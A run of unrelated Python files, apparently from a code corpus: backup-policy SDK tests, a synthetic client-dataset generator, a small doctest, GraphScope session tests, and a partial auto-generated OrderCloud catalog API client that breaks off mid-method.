            "remain_first_backup_of_curMonth": True,
            "rentention_num": 10,
            "frequency": 1,
            "start_time": "12:00",
            "status": "ON"
        }
        policy = self.proxy.create_backup_policy("backup_policy_name",
                                                 **scheduled_policy)

        # boolean True is transferred on the wire as "Y"
        expect_post_json = {
            "backup_policy_name": "backup_policy_name",
            "scheduled_policy": {
                "remain_first_backup_of_curMonth": "Y",
                "rentention_num": 10,
                "frequency": 1,
                "start_time": "12:00",
                "status": "ON"
            }
        }
        self.assert_session_post_with("/backuppolicy", json=expect_post_json)
        self.assertEqual("af8a20b0-117d-4fc3-ae53-aa3968a4f870", policy.id)

    def test_update_backup_policy(self):
        self.mock_response_json_values({
            "backup_policy_id": "af8a20b0-117d-4fc3-ae53-aa3968a4f870"
        })

        attrs = self.get_file_content("update_policy.json")
        self.proxy.update_backup_policy("some-policy-id", **attrs)

        expected_json = {
            "backup_policy_name": "policy_01",
            "scheduled_policy": {
                "remain_first_backup_of_curMonth": "Y",
                "rentention_num": 10,
                "frequency": 1,
                "start_time": "12:00",
                "status": "ON"
            }
        }
        self.assert_session_put_with("backuppolicy/some-policy-id",
                                     json=expected_json)

    def test_delete_backup_policy_with_id(self):
        self.proxy.delete_backup_policy("some-config-id")
        self.assert_session_delete("backuppolicy/some-config-id")

    def test_link_resource_to_policy(self):
        self.mock_response_json_file_values("link_resources.json")

        policy = _backup_policy.BackupPolicy(id="policy-id")
        resources = ["volume-id-1", "volume-id-2"]
        linked_resources = self.proxy.link_resources_to_policy(policy,
                                                               resources)

        self.assert_session_post_with("/backuppolicyresources", json={
            "backup_policy_id": "policy-id",
            "resources": [{
                "resource_id": "volume-id-1",
                "resource_type": "volume"
            }, {
                "resource_id": "volume-id-2",
                "resource_type": "volume"
            }]
        })

        # response mixes one successful and one failed binding
        self.assertEqual(2, len(linked_resources))
        success = linked_resources[0]
        self.assertEqual("bce8d47a-af17-4169-901f-4c7ae9f29c2c",
                         success.resource_id)
        self.assertEqual("pod01.eu-de-01sa-brazil-1cn-north-1",
                         success.os_vol_host_attr)
        self.assertEqual("eu-de-01sa-brazil-1cn-north-1",
                         success.availability_zone)
        self.assertEqual("volume", success.resource_type)
        self.assertTrue(success.success)

        success = linked_resources[1]
        self.assertEqual("volume-id-2", success.resource_id)
        self.assertEqual("pod01.eu-de-01sa-brazil-1cn-north-1",
                         success.os_vol_host_attr)
        self.assertEqual("eu-de-01sa-brazil-1cn-north-1",
                         success.availability_zone)
        self.assertEqual("volume", success.resource_type)
        self.assertEqual("VBS.0002", success.code)
        self.assertEqual("xxxxx", success.message)
        self.assertFalse(success.success)

    def test_unlink_resource_of_policy(self):
        self.mock_response_json_file_values("unlink_resources.json")

        policy = _backup_policy.BackupPolicy(id="policy-id")
        resources = ["volume-id-1", "volume-id-2"]
        linked_resources = self.proxy.unlink_resources_of_policy(policy,
                                                                 resources)

        self.assert_session_post_with(
            "backuppolicyresources/policy-id/deleted_resources", json={
                "resources": [{
                    "resource_id": "volume-id-1"
                }, {
                    "resource_id": "volume-id-2"
                }]
            })

        self.assertEqual(2, len(linked_resources))
        success = linked_resources[0]
        self.assertEqual("bce8d47a-af17-4169-901f-4c7ae9f29c2c",
                         success.resource_id)
        self.assertTrue(success.success)

        success = linked_resources[1]
        self.assertEqual("volume-id-2", success.resource_id)
        self.assertEqual("VBS.0002", success.code)
        self.assertEqual("xxxxx", success.message)
        self.assertFalse(success.success)

    def test_execute_policy(self):
        policy = _backup_policy.BackupPolicy(id="policy-id")
        self.proxy.execute_policy(policy)
        self.assert_session_post_with("backuppolicy/policy-id/action",
                                      json=None)

    def test_enable_policy(self):
        self.mock_response_json_file_values("update_policy.json")
        policy = _backup_policy.BackupPolicy(id="policy-id")
        self.proxy.enable_policy(policy)
        self.assert_session_put_with("backuppolicy/policy-id", json={
            "scheduled_policy": {
                "status": "ON"
            }
        })

    def test_disable_policy(self):
        self.mock_response_json_file_values("update_policy.json")
        policy = _backup_policy.BackupPolicy(id="policy-id")
        self.proxy.disable_policy(policy)
        self.assert_session_put_with("backuppolicy/policy-id", json={
            "scheduled_policy": {
                "status": "OFF"
            }
        })

    def test_list_task(self):
        query = {
            "sort_dir": "asc",
            "sort_key": "created_at",
            "status": "RUNNING",
            "id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319",
            "limit": 10,
            "offset": 10
        }
        self.mock_response_json_file_values("list_tasks.json")
        tasks = list(self.proxy.tasks("policy-id", **query))

        # the 'id' filter is transferred to the API as 'job_id'
        transferred_query = {
            "sort_dir": "asc",
            "sort_key": "created_at",
            "status": "RUNNING",
            "job_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319",
            "limit": 10,
            "offset": 10
        }
        self.assert_session_list_with("/backuppolicy/policy-id/backuptasks",
                                      params=transferred_query)
        self.assertEqual(2, len(tasks))
        task = tasks[0]
        self.assertEqual("RUNNING", task.status)
        self.assertEqual("0781095c-b8ab-4ce5-99f3-4c5f6ff75319", task.id)
        self.assertEqual("2016-12-03T06:24:34.467", task.created_at)
        self.assertEqual("autobk_a61d", task.backup_name)
        self.assertEqual("f47a4ab5-11f5-4509-97f5-80ce0dd74e37",
                         task.resource_id)
        self.assertEqual("volume", task.resource_type)
python
import argparse

import numpy as np
import pandas as pd
from scipy.stats import norm

# NOTE: the unused ``scipy.stats.itemfreq`` import was dropped — it was
# removed in SciPy 1.3 and made this whole script fail to import.


def pick_profession(age, income, github_stars, height):
    """Map one person's attributes to a synthetic profession label.

    Rules are checked top to bottom; the first matching rule wins.
    """
    if age > 50 and income > 20000:
        return 'president'
    if height > 190 and income > 5000:
        return 'basketball player'
    if github_stars > 30:
        # Heavy open-source contributors split on income.
        return 'software architect' if income > 20000 else 'programmer'
    if age % 2 == 0 and github_stars % 3 == 1:
        return 'reality tv star'
    if age < 20:
        return 'student'
    if income < 1000:
        return 'soldier' if height > 180 else 'unemployed'
    if income < 5000 and height > 180:
        return 'officer'
    if height > 180:
        return 'general'
    return 'car salesman'


def _build_parser():
    """Build the command-line interface for the generator."""
    parser = argparse.ArgumentParser()
    parser.add_argument(
        'RowCount',
        type=int,
        help='The number of rows to generate'
    )
    parser.add_argument(
        '--show-graph',
        help='Show a graph of the results, -x and -y must be given',
        action='store_true'
    )
    axis_choices = ['Age', 'Income', 'Height', 'Github_stars']
    parser.add_argument(
        '-x',
        help='The x-axis of the graph',
        type=str,
        choices=axis_choices
    )
    parser.add_argument(
        '-y',
        help='The y-axis of the graph',
        type=str,
        choices=axis_choices
    )
    parser.add_argument(
        '-f', '--file',
        help='Save the data to a file',
        type=str
    )
    return parser


def main():
    """Generate the synthetic client dataset and report/plot/save it."""
    # Imported lazily so that importing this module (e.g. to reuse
    # pick_profession) does not require sklearn or matplotlib.
    from sklearn.datasets import make_regression
    import matplotlib.pyplot as plt

    parser = _build_parser()
    args = parser.parse_args()
    if args.show_graph and (args.x is None or args.y is None):
        # Bug fix: previously df[None] raised a KeyError at plot time.
        parser.error('--show-graph requires both -x and -y')

    row_count = args.RowCount
    age, income = make_regression(row_count, 1, 1, noise=3.3, random_state=42)
    age = age.reshape((row_count,))
    age = np.floor(np.log(age * age + 1) * 17 + 20)
    income = income * income * 6 + 500
    # Stars correlate non-linearly with age and weakly with income.
    github_stars = np.floor(-0.169 * age * age + 10 * age + income / 750 - 130)
    height = norm.rvs(size=row_count, loc=180, scale=10, random_state=42)
    xs = -github_stars * height / 10 + age ** 2 / 2
    # Deliberately unseeded, as in the original: client labels vary per run.
    is_client = (norm.rvs(size=row_count, loc=-100, scale=100) + xs) > 0
    profession = [
        pick_profession(age[i], income[i], github_stars[i], height[i])
        for i in range(row_count)
    ]
    df = pd.DataFrame(
        {
            'Age': age,
            'Income': income,
            'Github_stars': github_stars,
            'Height': height,
            'Profession': profession,
            'Is_client': is_client,
        }
    )

    print('Max age {0}, min age: {1}'.format(age.max(), age.min()))
    print('Max income {0}, min income: {1}'.format(income.max(), income.min()))
    print('Max stars {0}, min stars: {1}'.format(github_stars.max(),
                                                 github_stars.min()))
    print('Max height {0}, min height: {1}'.format(height.max(), height.min()))
    print('Profession counts')
    print(df.Profession.value_counts())
    print('Client counts')
    print(df.Is_client.value_counts())
    print(df[0:20])

    if args.show_graph:
        plt.plot(df[args.x], df[args.y], 'o')
        plt.show()
    if args.file is not None:
        df.to_csv(args.file)


if __name__ == '__main__':
    main()
python
""" >>> def fn(arg1,arg2): pass >>> co = fn.func_code >>> co.co_argcount 2 >>> co.co_varnames ('arg1', 'arg2') """ def _test(): import doctest doctest.testmod() if __name__ == "__main__": _test()
python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import json
import os
import tempfile

import pytest

import graphscope

COORDINATOR_HOME = os.path.join(os.path.dirname(__file__), "../", "../coordinator")

new_data_dir = os.path.expandvars("${GS_TEST_DIR}/new_property/v2_e2")


def setUpModule():
    """Configure global graphscope options once for this module."""
    graphscope.set_option(show_log=True)
    graphscope.set_option(initializing_interactive_engine=False)


@pytest.fixture
def invalid_config_file():
    """Yield the path of a config file containing malformed JSON."""
    with tempfile.TemporaryDirectory() as dir_name:
        json_path = os.path.join(dir_name, "test.json")
        with open(json_path, "w") as f:
            # json format is incorrect.
            f.write('{"xxx": ["xxx"],"xxx": 9527 "num_workers": 4}')
        yield json_path


@pytest.fixture
def local_config_file():
    """Yield the path of a valid JSON config file with 4 workers."""
    conf = {"num_workers": 4}
    with tempfile.TemporaryDirectory() as dir_name:
        json_path = os.path.join(dir_name, "test.json")
        with open(json_path, "w") as f:
            json.dump(conf, f)
        yield json_path


# load property graph to specified session
def load_graph(session):
    """Load the 2-vertex-label / 2-edge-label twitter property graph.

    Edge files follow the naming scheme twitter_e_<src>_<dst>_<elabel>, one
    file per (src label, dst label) pair and edge label.
    """
    g = session.load_from(
        edges={
            "e{}".format(elabel): [
                (
                    "{}/twitter_e_{}_{}_{}#header_row=true".format(
                        new_data_dir, src, dst, elabel
                    ),
                    ["weight"],
                    ("src", "v{}".format(src)),
                    ("dst", "v{}".format(dst)),
                )
                for src in (0, 1)
                for dst in (0, 1)
            ]
            for elabel in (0, 1)
        },
        vertices={
            "v0": "{}/twitter_v_0#header_row=true".format(new_data_dir),
            "v1": "{}/twitter_v_1#header_row=true".format(new_data_dir),
        },
        generate_eid=False,
    )
    return g


def test_default_session():
    default_sess = graphscope.get_default_session()
    assert default_sess.info["status"] == "active"
    default_sess.close()
    assert default_sess.info["status"] == "closed"


def test_launch_cluster_on_local(local_config_file):
    s = graphscope.session(cluster_type="hosts", config=local_config_file)
    info = s.info
    assert info["status"] == "active"
    s.close()


@pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI")
def test_launch_session_from_config(local_config_file):
    # Bug fix: the variable used to be restored to "" even when it was not
    # set before the test, leaking an empty GS_CONFIG_PATH into later tests.
    saved = os.environ.get("GS_CONFIG_PATH")
    try:
        os.environ["GS_CONFIG_PATH"] = local_config_file
        s = graphscope.session(cluster_type="hosts")
        info = s.info
        assert info["status"] == "active"
        s.close()
    finally:
        if saved is None:
            os.environ.pop("GS_CONFIG_PATH", None)
        else:
            os.environ["GS_CONFIG_PATH"] = saved


@pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI")
def test_launch_session_from_dict():
    conf_dict = {"num_workers": 4}
    s = graphscope.session(cluster_type="hosts", config=conf_dict)
    info = s.info
    assert info["status"] == "active"
    s.close()


@pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI")
def test_config_dict_has_highest_priority(local_config_file):
    s = graphscope.session(
        cluster_type="hosts", config=local_config_file, num_workers=2
    )
    info = s.info
    assert info["status"] == "active"
    s.close()


def test_error_on_config_file_not_exist():
    with pytest.raises(FileNotFoundError, match="No such file or directory"):
        graphscope.session(cluster_type="hosts", config="~/non_existing_filename.txt")


def test_error_on_invalid_config_file(invalid_config_file):
    # invalid config file (example json format incorrect)
    with pytest.raises(json.decoder.JSONDecodeError):
        graphscope.session(cluster_type="hosts", config=invalid_config_file)


def test_correct_closing_on_hosts():
    s1 = graphscope.session(cluster_type="hosts")
    s1.close()
    # check, launched coordinator and graphscope-engines on local are correctly closed.
    # test close twice
    s1.close()


@pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI")
def test_border_cases():
    s1 = graphscope.session(cluster_type="hosts")
    s2 = graphscope.session(cluster_type="hosts")
    s3 = graphscope.session(cluster_type="hosts")

    s1.as_default()
    assert graphscope.get_default_session() == s1

    g3 = load_graph(s3)

    with pytest.raises(
        ValueError,
        match="A default session is already active. You must explicitly call Session.close().",
    ):
        s2.as_default()

    s1.close()

    s2.as_default()
    assert graphscope.get_default_session() == s2
    s2.close()

    s3.as_default()
    assert graphscope.get_default_session() == s3
    sssp = graphscope.property_sssp(g3, src=4)  # ok, g3 belong to s3
    s3.close()


def test_with():
    with graphscope.session(cluster_type="hosts") as sess:
        assert graphscope.get_default_session() == sess

    sess = graphscope.session(cluster_type="hosts")
    with sess:
        pass
    assert sess.info["status"] == "closed"
python
# coding: utf-8 """ OrderCloud No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) OpenAPI spec version: 1.0 Contact: [email protected] Generated by: https://github.com/swagger-api/swagger-codegen.git Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from __future__ import absolute_import import sys import os import re # python 2 and python 3 compatibility library from six import iteritems from ..configuration import Configuration from ..api_client import ApiClient class CatalogApi(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): config = Configuration() if api_client: self.api_client = api_client else: if not config.api_client: config.api_client = ApiClient() self.api_client = config.api_client def create(self, catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create(catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param Catalog catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.create_with_http_info(catalog, **kwargs) else: (data) = self.create_with_http_info(catalog, **kwargs) return data def create_with_http_info(self, catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_with_http_info(catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param Catalog catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ all_params = ['catalog'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method create" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog' is set if ('catalog' not in params) or (params['catalog'] is None): raise ValueError("Missing the required parameter `catalog` when calling `create`") resource_path = '/catalogs'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None if 'catalog' in params: body_params = params['catalog'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, 
post_params=form_params, files=local_var_files, response_type='Catalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete(self, catalog_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete(catalog_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_with_http_info(catalog_id, **kwargs) else: (data) = self.delete_with_http_info(catalog_id, **kwargs) return data def delete_with_http_info(self, catalog_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_with_http_info(catalog_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :return: None If the method is called asynchronously, returns the request thread. 
""" all_params = ['catalog_id'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `delete`") resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete_assignment(self, catalog_id, buyer_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_assignment(catalog_id, buyer_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. 
(required) :param str buyer_id: ID of the buyer. (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_assignment_with_http_info(catalog_id, buyer_id, **kwargs) else: (data) = self.delete_assignment_with_http_info(catalog_id, buyer_id, **kwargs) return data def delete_assignment_with_http_info(self, catalog_id, buyer_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_assignment_with_http_info(catalog_id, buyer_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param str buyer_id: ID of the buyer. (required) :return: None If the method is called asynchronously, returns the request thread. 
""" all_params = ['catalog_id', 'buyer_id'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_assignment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `delete_assignment`") # verify the required parameter 'buyer_id' is set if ('buyer_id' not in params) or (params['buyer_id'] is None): raise ValueError("Missing the required parameter `buyer_id` when calling `delete_assignment`") resource_path = '/catalogs/{catalogID}/assignments'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] query_params = {} if 'buyer_id' in params: query_params['buyerID'] = params['buyer_id'] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete_product_assignment(self, catalog_id, product_id, **kwargs): """ This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_product_assignment(catalog_id, product_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param str product_id: ID of the product. (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_product_assignment_with_http_info(catalog_id, product_id, **kwargs) else: (data) = self.delete_product_assignment_with_http_info(catalog_id, product_id, **kwargs) return data def delete_product_assignment_with_http_info(self, catalog_id, product_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_product_assignment_with_http_info(catalog_id, product_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param str product_id: ID of the product. (required) :return: None If the method is called asynchronously, returns the request thread. 
""" all_params = ['catalog_id', 'product_id'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_product_assignment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `delete_product_assignment`") # verify the required parameter 'product_id' is set if ('product_id' not in params) or (params['product_id'] is None): raise ValueError("Missing the required parameter `product_id` when calling `delete_product_assignment`") resource_path = '/catalogs/{catalogID}/productassignments/{productID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] if 'product_id' in params: path_params['productID'] = params['product_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get(self, catalog_id, **kwargs): """ This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get(catalog_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_with_http_info(catalog_id, **kwargs) else: (data) = self.get_with_http_info(catalog_id, **kwargs) return data def get_with_http_info(self, catalog_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_with_http_info(catalog_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :return: Catalog If the method is called asynchronously, returns the request thread. 
""" all_params = ['catalog_id'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `get`") resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='Catalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def list(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str search: Word or phrase to search for. :param str search_on: Comma-delimited list of fields to search on. 
:param str sort_by: Comma-delimited list of fields to sort by. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???' :return: ListCatalog If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.list_with_http_info(**kwargs) else: (data) = self.list_with_http_info(**kwargs) return data def list_with_http_info(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list_with_http_info(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str search: Word or phrase to search for. :param str search_on: Comma-delimited list of fields to search on. :param str sort_by: Comma-delimited list of fields to sort by. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???' :return: ListCatalog If the method is called asynchronously, returns the request thread. 
""" all_params = ['search', 'search_on', 'sort_by', 'page', 'page_size', 'filters'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method list" % key ) params[key] = val del params['kwargs'] resource_path = '/catalogs'.replace('{format}', 'json') path_params = {} query_params = {} if 'search' in params: query_params['search'] = params['search'] if 'search_on' in params: query_params['searchOn'] = params['search_on'] if 'sort_by' in params: query_params['sortBy'] = params['sort_by'] if 'page' in params: query_params['page'] = params['page'] if 'page_size' in params: query_params['pageSize'] = params['page_size'] if 'filters' in params: query_params['filters'] = params['filters'] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='ListCatalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def list_assignments(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. 
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_assignments(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog.
        :param str buyer_id: ID of the buyer.
        :param int page: Page of results to return. Default: 1
        :param int page_size: Number of results to return per page.
            Default: 20, max: 100.
        :return: ListCatalogAssignment
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Ask the transport layer for the payload only; without this flag the
        # *_with_http_info variant returns (data, status, headers).
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            # Asynchronous mode: the request thread is returned immediately.
            return self.list_assignments_with_http_info(**kwargs)
        else:
            (data) = self.list_assignments_with_http_info(**kwargs)
            return data

    def list_assignments_with_http_info(self, **kwargs):
        """
        Auto-generated transport method for GET /catalogs/assignments.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_assignments_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog.
        :param str buyer_id: ID of the buyer.
        :param int page: Page of results to return. Default: 1
        :param int page_size: Number of results to return per page.
            Default: 20, max: 100.
        :return: ListCatalogAssignment
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['catalog_id', 'buyer_id', 'page', 'page_size']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # NOTE: locals() is snapshotted into a plain dict here; mutating
        # `params` below does NOT change the real local variables.
        params = locals()
